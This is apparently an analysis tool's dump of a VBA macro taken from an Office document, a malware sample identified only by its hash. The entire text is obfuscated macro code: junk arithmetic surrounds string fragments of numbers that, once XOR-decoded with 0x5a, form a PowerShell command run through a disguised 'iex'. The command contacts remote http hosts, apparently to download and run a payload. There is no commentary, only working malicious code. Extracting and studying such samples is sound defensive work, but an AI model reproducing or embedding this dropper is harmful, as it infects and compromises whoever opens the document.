Filename     : ./macros/b95d85089f9f10d30f37db9ae03e4ff96ea1ed8ec7d598cf2bb29859567734c6
OLE stream   : Macros/VBA/qjBoXiJFkihOz
VBA filename : qjBoXiJFkihOz.bas
----------------------------------------
Attribute VB_Name = "qjBoXiJFkihOz"
Function uaVOPhDiY()
On Error Resume Next
bdzdL = wwcrHi * CSng(37831 * Fix(92514)) * jUputr + CSng(fGwEA + CLng(sfEzw)) / (XSokw * CSng(23256) - (62658 + Fix(AMMQwz) - (65258 + CLng(HHCrcI - Log(qhHihF) - 94959 + Int(KjQYUs)))))
wYDYCh = 65265 / 47835
qiMNRS = Atn(fFDiwX + Sin(uHaOTz) - 5646 / 84343)
StUbbz = 95597 + 69545
BXQUi = qfwCB
oUoZXUMLcS = "ell  .( $PsHoM" + "e[2" + "1]+$pShOMe[30]" + "+'X') ((" + "(126 " + ", 48,17, 25 " + ", 48,45 ," + "32 ,122 ," + " 10" + "3, 122 "
JzlUTQ = dorpKw
vhwFN = OtswXi * CSng(41353 * Fix(94452)) * jacLY + CSng(BAqwzQ + CLng(imErOM)) / (qRPQY * CSng(53830) - (72564 + Fix(DdBdK) - (49218 + CLng(pAilM - Log(jIGNYk) - 21294 + Int(ujPIq)))))
KJIDz = 83096 / 51277
wHZqPc = 81695 + 19608
OLLnw = Atn(zzMzW + Sin(EZzEM) - 55196 / 99614)
JqjBa = ",52,63 ,4" + "5,119,53,56" + ",48 " + ", 63,57,46 , "
btkzjV = uqhzN
mJiwF = InFbw * CSng(76136 * Fix(30329)) * CnoiT + CSng(VmpPb + CLng(wMhKo)) / (TdwLoR * CSng(78208) - (50495 + Fix(Ekiwvf) - (95600 + CLng(fsHoaw - Log(TPXsEw) - 11138 + Int(mITmNq)))))
twVjw = 81360 / 92191
vJrSjl = 15728 + 80780
WqtjQC = Atn(RjhAX + Sin(RhBtf) - 97136 / 83644)
scFzl = "122" + ", 40,59,52 ," + " 62, 53,55" + " , 97 ," + "126 , 9 , 23 " + ", 55 ,49 ,27 " + ",122 ,103,12"
hUsZTc = OMbzsq
GOzZdt = ASLKc * CSng(9494 * Fix(77407)) * ZVwQH + CSng(zAibC + CLng(RKvNri)) / (mVwHs * CSng(44625) - (43287 + Fix(PlCVmW) - (75630 + CLng(hjnzY - Log(OVzaH) - 12490 + Int(WwTtEB)))))
KSPQAs = 76587 / 66639
rKDZDc = 9400 + 12714
aODtkL = Atn(OcGQPi + Sin(NhDjc) - 56477 / 14097)
tTrIvWMTY = "2 , 52 , 63,4" + "5 , 119 , 53,56" + " , 48,63," + " 57, 46 , 122 ," + " 9 ,35, 41" + ",46,63, 55,116" + ", 20 " + ", 63 ,46,"
CwwIl = wONAFv
YnzEli = Kpbtd * CSng(66647 * Fix(90527)) * kuFIVP + CSng(IkTIX + CLng(VjXSSF)) / (EcOqPt * CSng(4596) - (71979 + Fix(zNbzq) - (89845 + CLng(LHoNV - Log(MkdHjp) - 12629 + Int(bKdwh)))))
iNIMN = 59356 / 39624
scfJQ = 31820 + 18504
fOtbM = Atn(jkGja + Sin(aUMKis) - 50830 / 47683)
WRISLNXNwWN = " 116,13" + ",63,56,25, 54 " + ", 51 , " + "63,"
DEdzIB = BAjhci
kYItBA = OzlPMD * CSng(66228 * Fix(53585)) * olPwRr + CSng(cnzQb + CLng(wsdHVN)) / (zshvdw * CSng(1649) - (36955 + Fix(PaOFuZ) - (2064 + CLng(UPsCfG - Log(kIlAt) - 73042 + Int(iVBpw)))))
UNzZu = 18631 / 85090
iwjjOm = 83276 + 32233
TSSrC = Atn(YZBWjY + Sin(BmGUXT) - 73510 / 61121)
vsiZmmRbj = "52, 46" + ",97, 126 , " + "54,57 ,11," + "32 , " + "57,10, 122, 103" + " ,122 ,125 ,"
KXaEnw = BaKhT
KXIzE = cBOjIT * CSng(59672 * Fix(91443)) * tkJSWk + CSng(CciMX + CLng(JrQsY)) / (TZAEsK * CSng(47629) - (64234 + Fix(wZSWj) - (14956 + CLng(hShIlF - Log(fOsTE) - 84551 + Int(QPuwc)))))
UpzrU = 79682 / 90896
BcBkSc = 1084 + 58774
sjRHz = Atn(lGCQp + Sin(QSJzKQ) - 95811 / 25851)
GndMcahQhaU = "50" + " , 46, 4" + "6 , 42 ,96, 11" + "7 , 117 ,45 ,5" + "1, 52 ,62,45," + " 59" + ",40,62,45 , 59 " + ", 49 , 63 , 1" + "16,57" + ",53, 55, 11"
WwFBq = NGMsB
EiwPO = qRQcN * CSng(81943 * Fix(52965)) * sPncTI + CSng(kFPtrs + CLng(vPhPhL)) / (tcoYa * CSng(19899) - (69182 + Fix(iUdmj) - (9957 + CLng(oKFEYT - Log(iVXfw) - 42464 + Int(vzIPn)))))
TBvLNI = 74076 / 42978
cwDbn = 49105 + 26237
nwDswL = Atn(XvQEIm + Sin(aWKcn) - 72126 / 39284)
LhlWFZZK = "7,3 ,61," + "8, 19" + " ,117" + " ," + "26 ,50 , 4" + "6, 46,4" + "2," + " 96," + " 117, 1"
YJQwKF = pJsJWG
bBftiC = mzSkZw * CSng(65877 * Fix(24240)) * GkPwWb + CSng(TGOiZz + CLng(iNiovu)) / (HLEQTP * CSng(49583) - (31613 + Fix(IkJiI) - (79881 + CLng(qJAIM - Log(PUXnwk) - 45820 + Int(InRGwZ)))))
tfQpsW = 99854 / 94717
ESWMOa = 48858 + 76513
jDMTC = Atn(GzQUqs + Sin(riulO) - 40986 / 91589)
wOHfuiJGQ = "17 ,57 ," + "54,53 , 47 " + ",62,57, 59 , " + "42 ,6" + "1 , 59 ,55,63, " + "41 ,116 , 5" + "7, 53 , "
uaVOPhDiY = oUoZXUMLcS + JqjBa + scFzl + tTrIvWMTY + WRISLNXNwWN + vsiZmmRbj + GndMcahQhaU + LhlWFZZK + wOHfuiJGQ
End Function
Function kjltn()
On Error Resume Next
GZZjI = YzitH
ddbnXv = KXGAYw * CSng(63845 * Fix(54671)) * hYGwE + CSng(mMmMJw + CLng(XWELf)) / (nXXhsL * CSng(99060) - (41100 + Fix(WiWaO) - (32499 + CLng(ElknA - Log(PALlfm) - 324 + Int(vNQApj)))))
WHjNV = 35491 / 50734
HrUzd = 85648 + 61930
rNkFH = Atn(qEqjjG + Sin(RSbsf) - 92114 / 14811)
XvlObjp = "55, " + "117 ,42 ," + "9,13 ,23, 27 ," + "117," + " 26, 50, " + "46,46 , "
NimJwV = FfvCH
mYUtZn = GDsmQ * CSng(30569 * Fix(67573)) * KJWzDu + CSng(JmoiZC + CLng(jhazz)) / (hEjKUt * CSng(33783) - (92437 + Fix(HqJNkr) - (75038 + CLng(zOiKO - Log(FqOSBU) - 19654 + Int(RSACF)))))
GbPcj = 91425 / 48890
wUCwf = 90393 + 36166
McKcfT = Atn(zZLRNw + Sin(ckOYS) - 43955 / 51691)
VvMIbiLaln = "42, 96 ,11" + "7, 117 , 45" + ", 45,45,116, " + "43 , 45" + ",43 ,57 ,42, "
ElqjrE = UpfSwN
bjiCr = jNDmj * CSng(46115 * Fix(67059)) * jancHj + CSng(sXUSC + CLng(abEvM)) / (mlwDHE * CSng(97937) - (41195 + Fix(cISjiD) - (33242 + CLng(kIcAv - Log(MOjpRI) - 72564 + Int(rXfwNk)))))
pXPhNH = 57135 / 32804
CAoXl = 68280 + 62699
fYIKQ = Atn(OBjUA + Sin(NUmjs) - 82912 / 4841)
XQazzcSpI = "60 , 50, 42 ,1" + "16, " + "57 , 53" + " , 55 , 117 ,10" + "9,3 ,23, 46," + "49,117, 26," + "50, 46,46 " + ",42" + " , 9"
bZqsaC = DUYjj
FKzhII = zJnzFi * CSng(66675 * Fix(20483)) * VQCPCL + CSng(ncXuQO + CLng(AMHSjf)) / (KwbtrW * CSng(59742) - (1297 + Fix(WlGVC) - (25291 + CLng(YjtaL - Log(kNKja) - 75106 + Int(wMCivL)))))
iIvsP = 16967 / 18856
UQwYd = 9199 + 76992
bWLpF = Atn(UBJKsj + Sin(KiinFW) - 10944 / 22099)
pMzjvEVRUvL = "6, 117 ,117" + " , 57," + "59 ,41 ," + " 59 , 55 , 59 ," + " 46,59,55 "
REjalG = vTQjG
ZZFIN = DtNXMr * CSng(48846 * Fix(66672)) * pujjJ + CSng(kzWcIh + CLng(Brosf)) / (CAkjM * CSng(26970) - (41497 + Fix(HAXrf) - (35043 + CLng(EGrjU - Log(objjFG) - 73621 + Int(ViTLEj)))))
YADHH = 67876 / 34274
AruAa = 30537 + 57666
EKXSo = Atn(czwkd + Sin(rwlzJ) - 22117 / 78787)
PbJfQc = ",59 ,46" + " ,63,40 ,59, 1" + "16,51 , 4" + "6,1" + "17 ,4" + "4, 4" + "4,3, 59, 117 ,2"
OhwrT = Dmwsii
lJAPTt = GPLEH * CSng(82049 * Fix(61511)) * ECdkwp + CSng(sfiBuP + CLng(jPoWC)) / (ufKSNw * CSng(78838) - (8447 + Fix(bzVwr) - (84889 + CLng(OJwtH - Log(UhRzo) - 84 + Int(wQlnzz)))))
KdANIo = 40113 / 18453
ilwbr = 89623 + 91369
rLXAA = Atn(nDjjv + Sin(OHAiX) - 17269 / 47759)
zAlqka = "6 ,50" + " ,46, " + "46 ,42,96,117,1" + "17,53 ," + "52 , 54 ,51,52 "
GJohWB = rdWfXX
NfaWNO = JsLEd * CSng(85572 * Fix(39957)) * zhuazs + CSng(Qqztf + CLng(KsDsO)) / (ACXVGS * CSng(85272) - (55647 + Fix(jdAYd) - (73011 + CLng(iqBzt - Log(OkWTjv) - 99054 + Int(ILOSUz)))))
wmjwdG = 47136 / 34724
wlDPl = 54028 + 90410
LoIFP = Atn(jMwVB + Sin(DJNrRj) - 22323 / 75517)
FLlRLupiWt = ", " + "63," + "119,56, 59 , 52" + ",62 , 116 ," + " 52 , 54,1" + "17,51" + ", 55," + "59, 61, 6" + "3, 4" + "1 "
zaYpj = qOhXI
JlNBZ = lLKuM * CSng(29003 * Fix(85418)) * WmLwZD + CSng(HQaoBi + CLng(PdzoUA)) / (vJATir * CSng(22183) - (39599 + Fix(KjodZE) - (68562 + CLng(XiTCV - Log(NXiEvh) - 94169 + Int(urJbd)))))
EnQnfm = 78364 / 94788
hSvqvU = 94898 + 72305
frLdn = Atn(PFMAIL + Sin(cRmjcZ) - 42050 / 74586)
CWpNq = ", 117,52 ,63 , " + "45,41,42," + " 53 ,41, 46,5 " + ",51," + "55, 59, 61 "
kjltn = XvlObjp + VvMIbiLaln + XQazzcSpI + pMzjvEVRUvL + PbJfQc + zAlqka + FLlRLupiWt + CWpNq
End Function
Function crdjbwCfK()
On Error Resume Next
HRDWhw = ifIUp
hBHYk = XNAIcQ * CSng(30120 * Fix(62770)) * kVmkO + CSng(Nszika + CLng(jzLfjm)) / (wTzFtz * CSng(57198) - (28640 + Fix(vrvzl) - (97939 + CLng(hWtUT - Log(JtzMf) - 63203 + Int(zzkdt)))))
JFGhUw = 27684 / 53225
dvjnU = 14301 + 16426
RVhrO = Atn(wTCmp + Sin(GhhdIm) - 34589 / 36850)
iXSPYzQP = ", 63,41 ,117," + "17 ,2,51" + " ,108 ,98, 61" + ",117 ,125, 11" + "6 ," + "9,42, 54 , 51," + " 46 ,114," + "125"
UJAZi = CUkOiC
zLabHP = KuPkrF * CSng(59778 * Fix(45927)) * jzkcdH + CSng(wzDww + CLng(vzvHHJ)) / (cvZjZ * CSng(39050) - (70532 + Fix(kwBclH) - (79073 + CLng(irLqBc - Log(ERdLzS) - 78931 + Int(zVQwoZ)))))
vIlav = 27178 / 6585
HJiYz = 36753 + 38495
DJWQN = Atn(CWLrGz + Sin(QwTFA) - 33556 / 41627)
TBlsz = " ,26 ,125" + " ,1" + "15 ,97 , " + "126, 40 ," + " 14 " + ",32 , 23 , 62 " + ",122 ,103 ," + " 122,126 , 48" + " ,17,25 "
RLvAuN = PYrVcb
wWEoH = lqSlw * CSng(30282 * Fix(82658)) * FXicuw + CSng(lmTVd + CLng(sGTuCE)) / (LdVpj * CSng(2377) - (67645 + Fix(wtDibn) - (76146 + CLng(tqGDqM - Log(kTdMsk) - 97376 + Int(wLhVbB)))))
oqKzD = 13649 / 37914
SUtUcT = 2486 + 4069
wtPaos = Atn(qCAEI + Sin(DvBSwt) - 71261 / 43735)
kQkwccKT = ", 48, 45," + " 32, 116, 52" + " ,63, 34, " + "46,114 ," + "107"
fiBUvv = CjwnK
iQWtE = QqpIW * CSng(16882 * Fix(67379)) * NaJhOC + CSng(BQuacC + CLng(ZQFKiu)) / (idAJOz * CSng(64247) - (3893 + Fix(FSduN) - (96372 + CLng(TvMwjA - Log(ScWhRY) - 5598 + Int(ioPiw)))))
jrRQdJ = 86937 / 77304
nbYmB = 18162 + 29571
YADtz = Atn(oHzHV + Sin(nlPRww) - 58012 / 3476)
TlDothkHQ = " ,118,122" + ",1" + "08" + " , 10" + "4, 105,"
swIVG = spwRWw
EuarI = cWuvTK * CSng(55149 * Fix(80983)) * TpTIw + CSng(hOXDd + CLng(assva)) / (MaHuEm * CSng(42325) - (49440 + Fix(CsrSl) - (43515 + CLng(RbdEt - Log(XjDnf) - 65736 + Int(dBzsK)))))
bqQHn = 45487 / 62925
OMpkRz = 25462 + 79473
PSZlj = Atn(WFiVfk + Sin(hLbRRW) - 12348 / 19239)
mKXQZMJ = " 107,108" + ",108 , " + "115 , 97, 126 " + ", " + "45 ," + " 3"
crdjbwCfK = iXSPYzQP + TBlsz + kQkwccKT + TlDothkHQ + mKXQZMJ
End Function
Function vONFGzbpm()
On Error Resume Next
FcAQm = MsVuB
WEGMri = YzwZd * CSng(55325 * Fix(63613)) * VaNibU + CSng(jNKQS + CLng(UnjiP)) / (cDPuF * CSng(19223) - (39470 + Fix(SXXOh) - (82126 + CLng(SZdTJM - Log(UsCbP) - 13927 + Int(LSuNR)))))
jWriu = 25550 / 37215
KXCnAq = 4732 + 70716
ZGjHY = Atn(wmLpv + Sin(cnCODK) - 13131 / 97270)
KNUPN = "2,27 ,9, " + "50 " + ",52 ,122 , 1" + "03 ,122," + "126" + " , 63," + " 5" + "2 , 44,96"
coXLF = EzKpV
zOkHS = qjocit * CSng(56764 * Fix(60946)) * MuSqm + CSng(ViPEih + CLng(TlmGtQ)) / (rstzt * CSng(20731) - (55221 + Fix(sQImw) - (5582 + CLng(MazjMc - Log(UCkMPQ) - 6900 + Int(XAMWOT)))))
NjuMAC = 86952 / 15537
iIDGs = 75868 + 37508
UzcNR = Atn(wwwiXc + Sin(LJNEh) - 22629 / 46219)
GjIKAw = ",4" + "6 ,63,5" + "5 ,42,122" + " ," + "113 , 122 ," + "125" + " ,6 , 125 " + ",122 , 1" + "13, "
wdKHY = Atn(GcUmUI + Sin(sqEzaq) - 26712 / 39702)
pzLFME = Rjtwq
ndsni = 58571 + 26724
IpCvJH = hAQoF * CSng(78114 * Fix(43965)) * iFNFJ + CSng(FWWCl + CLng(DCYVX)) / (VRnlbC * CSng(97560) - (69842 + Fix(wuBQQ) - (32448 + CLng(JiRYE - Log(DSjtXh) - 24928 + Int(bvQaTF)))))
hfRXs = 43530 / 98448
lGzjjF = "122 , 126" + ",40, 14 , 32,23" + " , " + "62 , 122," + " 113" + " , 122 ,125" + " , 116, 63, 34 " + ",63 , 125,97" + ", 60, 53,40,"
KdXGP = Atn(FQQQzQ + Sin(AmPkkq) - 86424 / 76826)
Dcwqv = VcphU
HCYhm = 71573 + 82189
zcrzr = fqBskc * CSng(67953 * Fix(93641)) * zZflz + CSng(uzRdta + CLng(spGlIT)) / (UTHVIa * CSng(52045) - (58795 + Fix(MNcKi) - (52426 + CLng(GzsjF - Log(aTwVDz) - 22815 + Int(wUPGCi)))))
nXdSO = 25619 / 87501
vGuUDlTOc = "63 ,59,57 ,50" + ",114 , 12" + "6 " + ", 57 , 19 ,5" + "7, 14, 23,1" + "22," + "51 , 5"
ivjYI = Atn(KvCLq + Sin(jAwDdJ) - 10159 / 22932)
IMdEIk = mQYtS
hEFji = 72036 + 24560
fWMld = pzdzis * CSng(43283 * Fix(6649)) * VUrEP + CSng(HuIXkp + CLng(SwodAo)) / (jPLMIj * CSng(41593) - (98276 + Fix(wchisj) - (24650 + CLng(jwKYbD - Log(tzGhh) - 17316 + Int(rhWfG)))))
SLZnRj = 86289 / 71840
MUzUo = "2 ,122,1" + "26 , 54,57" + ", 11 , 32 ,5" + "7, 10 ,115, 33 " + ",46 , 4" + "0 ,35, " + "33 ," + " 126 , 9,23," + "55," + " 49,27, "
vONFGzbpm = KNUPN + GjIKAw + lGzjjF + vGuUDlTOc + MUzUo
End Function
Function FvFzplbcY()
On Error Resume Next
kpTbp = Atn(osXvB + Sin(lzibr) - 13728 / 29419)
ZtXhVn = XASmH
lQwzIJ = 76846 + 7863
auKLk = kqTRJ * CSng(6276 * Fix(7068)) * FfrLpr + CSng(jSfbaJ + CLng(Tajzvv)) / (jtzAEC * CSng(49384) - (9845 + Fix(InhmtS) - (31429 + CLng(wMTuci - Log(JzvWsh) - 23792 + Int(IsWlu)))))
qFGDM = 90161 / 92580
zSfwES = "116, 30 ,53" + ",45, 52,54 ,53 " + ", 59 , 62, 28,5" + "1 ,54 ," + "63," + " 114,126, 57"
AiDVp = Atn(ccdbd + Sin(jlAHsk) - 33257 / 25271)
WOKssT = sRGRl
RcAViw = 25629 + 48703
APWhTf = QOubIT * CSng(56617 * Fix(47088)) * owlKa + CSng(UIRZc + CLng(hiwiG)) / (tHLoTh * CSng(79113) - (70245 + Fix(rjnzz) - (53051 + CLng(twbOG - Log(uNQuDc) - 66232 + Int(wsBbkQ)))))
XZiMCS = 91858 / 76235
rlVpCKZl = " ," + " 19 " + ", 57 , " + "14" + " ," + "23 ,116, " + "14,53," + "9 ,46,40" + " , 51, 52,61"
FdSkO = Atn(GKNotu + Sin(lMkzSI) - 75438 / 98008)
mrQIdw = vjBzm
SZzCzv = 71863 + 18338
TDLcFZ = nCjoq * CSng(10879 * Fix(28808)) * nsjiz + CSng(KvLkG + CLng(PzTzC)) / (fvHhPN * CSng(97982) - (69695 + Fix(EkzwMK) - (56391 + CLng(HPCKW - Log(IzszT) - 86585 + Int(ihmOaT)))))
XOirpV = 7242 / 21896
bSCcwRJtaMM = ", 114,115,1" + "18,122" + ",126, 45 " + ",32 ,27 ,"
sSrKvU = Atn(zUJLXL + Sin(zLKwUM) - 58965 / 30848)
bLdSj = NkasaC
FZGCW = 93223 + 73597
RjNYFD = XBkGC * CSng(13446 * Fix(13689)) * Vcioh + CSng(clBvU + CLng(FkmwH)) / (mUKCk * CSng(46192) - (86204 + Fix(XiQrj) - (92865 + CLng(VkaoIE - Log(puMcl) - 89037 + Int(nPmzdU)))))
HmwOkP = 59105 / 84447
FihYuBCziE = "9, 50,52" + ",115, " + "97, 9,46, 59" + ",40 ,46," + "119 ,10 ,40" + " ,53" + ", 57 , 6" + "3,41 ,41 , 122" + ", 126,45 " + ", 32,27, 9, 5"
FvFzplbcY = zSfwES + rlVpCKZl + bSCcwRJtaMM + FihYuBCziE
End Function
Function dziQDmG()
On Error Resume Next
vFscbV = Atn(aaECf + Sin(fprlI) - 54870 / 45787)
wKDooD = wTtUu
NjPnD = 53111 + 975
IHccj = wGOhp * CSng(34388 * Fix(10701)) * zGhcjl + CSng(mlpnrY + CLng(wzMDr)) / (TDApzF * CSng(31807) - (58958 + Fix(LklLR) - (68729 + CLng(GauOZ - Log(Vnpsz) - 64033 + Int(QUmaI)))))
hNzHFj = 44442 / 90641
QCAnJsGJi = "0 ," + " 52 ,97 , 56" + ",40, 63" + " ,59 , 4" + "9,97 ,39,57," + "59 , 46, 57 , 5" + "0 ,33 , 45 , 40" + ",51 ,46,63 ,1"
bHKqa = Atn(pbCQK + Sin(XZYLiz) - 71791 / 65244)
QZQtDp = woQmzK
inMsBR = 49705 + 67768
zkfNss = Vlhfk * CSng(11709 * Fix(83956)) * Srmcno + CSng(DDmfMu + CLng(hFVHU)) / (SJaKV * CSng(55242) - (96393 + Fix(mOLcv) - (69348 + CLng(KfwvpP - Log(baNfaI) - 8183 + Int(KdlfKJ)))))
zqBpDJ = 8276 / 65204
wcrNG = "19,50,5" + "3,41 ,46,122" + ",126,5, 116," + " 3" + "1 ,34 , 5" + "7,63," + "42" + " ,46, " + "51 , 53, 52,116"
jBvJwi = Atn(KuvpNG + Sin(TZPZJ) - 19936 / 94351)
bVwwSB = tsrjtl
QVjDl = 33909 + 13092
YbQdQI = XGktM * CSng(777 * Fix(70417)) * dViaj + CSng(UvAnb + CLng(TWGSQj)) / (BpcaYb * CSng(95458) - (33226 + Fix(BFwOf) - (99299 + CLng(hDraY - Log(fQqpX) - 63528 + Int(zSdcR)))))
MjjEQ = 32654 / 19493
jwISRacW = " ,23," + "63, 41" + ",41," + "59 ,61 , 63 " + ", "
aAGGO = Atn(irXLw + Sin(BwjsWz) - 96708 / 168)
PbuFR = HEHXip
AbRMj = 50221 + 6307
SHmXp = atSaA * CSng(22050 * Fix(37263)) * QJBSo + CSng(jRdDX + CLng(iHnDkk)) / (XDpJvM * CSng(49452) - (36196 + Fix(ZGsZBh) - (21695 + CLng(LNmhX - Log(dizwc) - 36160 + Int(OqQfv)))))
MbvNw = 43 / 85111
XIaSiXHsKr = "97, 39 , 39" + ") | " + "fOrEACh {[" + "CHaR" + "]( $_-BXOR " + Chr(34) + "0x5" + "a" + Chr(34) + " )}) -" + "JOiN "
arZhq = Atn(uAUsLO + Sin(QwidT) - 32409 / 17423)
BbnnM = BKUKm
GXBJb = 43178 + 50352
TShvO = ZKsRD * CSng(80654 * Fix(62032)) * jDjkL + CSng(oPaUK + CLng(GEuEVd)) / (qwIMK * CSng(5249) - (41573 + Fix(tOGbzd) - (97165 + CLng(zarKBh - Log(sNkWI) - 40307 + Int(owZXq)))))
QzZjMN = 56170 / 49670
JwmnLZzw = "'' )"
dziQDmG = QCAnJsGJi + wcrNG + jwISRacW + XIaSiXHsKr + JwmnLZzw
End Function

